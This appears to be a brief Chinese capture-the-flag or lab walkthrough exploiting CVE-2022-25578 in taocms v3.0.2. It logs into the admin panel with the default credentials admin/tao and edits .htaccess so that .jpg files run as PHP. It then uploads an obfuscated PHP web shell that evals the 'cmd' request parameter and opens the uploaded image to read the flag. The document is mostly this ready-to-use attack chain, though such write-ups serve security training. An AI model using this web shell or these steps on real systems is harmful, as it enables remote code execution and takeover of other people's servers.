CVE-2022-25578
一、漏洞介绍
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
二、渗透步骤
1、打开网站
http://eci-2ze4o7o53lda5el3h2kd.cloudeci1.ichunqiu.com/
2、登录后台
http://eci-2ze4o7o53lda5el3h2kd.cloudeci1.ichunqiu.com/admin/admin.php?action=frame&ctrl=login
# 账号:admin
# 密码:tao
3、修改配置文件
http://eci-2ze4o7o53lda5el3h2kd.cloudeci1.ichunqiu.com/admin/admin.php?action=frame&ctrl=iframes
AddType application/x-httpd-php .jpg
4、文件上传
http://eci-2ze4o7o53lda5el3h2kd.cloudeci1.ichunqiu.com/admin/admin.php?action=frame&ctrl=iframes
<?php class G6MdvLsT { public function __construct($HF24f){ @eval("/*Z196iMYYE9*/".$HF24f.""); }}new G6MdvLsT($_REQUEST['cmd']);?>
5、查看flag值
http://eci-2ze4o7o53lda5el3h2kd.cloudeci1.ichunqiu.com/pictures/month_2306/202306180428192603.jpg